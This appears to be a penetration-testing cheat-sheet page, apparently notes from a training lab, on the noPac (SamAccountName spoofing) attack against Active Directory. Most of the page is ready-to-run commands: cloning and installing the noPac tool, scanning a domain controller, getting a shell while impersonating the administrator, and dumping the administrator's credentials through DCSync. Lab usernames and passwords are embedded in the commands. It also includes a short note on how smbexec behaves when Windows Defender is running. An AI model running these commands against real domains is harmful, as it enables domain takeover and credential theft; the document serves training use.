nopac

nopac attack (`SamAccountName` spoofing)

Installing tool

Ensure impacket tools are installed
python3 setup.py install
git clone https://github.com/Ridter/noPac.git

Scanning for nopac vulnerability

sudo python3 scanner.py inlanefreight.local/<user>:<pass> -dc-ip 172.16.5.5 -use-ldap

Run nopack & get a shell

sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

Using `noPac` to DCSync the built-in administrator account attack

sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator

Windows defender: If windows defender is enabled on the target, our shell session may be established, but issuing any command will likely fail. The first thing smbexec.py does is create a service called BTOBTO, another service called BTOBO is created, and any command we type is sent to the target over SMB inside a .bat file. With each command we type, a new batch script is created and echoed to a temp file and deleted it.

Previousno-password-required Nextpassword-in-description-filed

Last updated 1 month ago

hashtagnopac attack (SamAccountName spoofing)

hashtagUsing noPac to DCSync the built-in administrator account attack

nopac attack (`SamAccountName` spoofing)

Using `noPac` to DCSync the built-in administrator account attack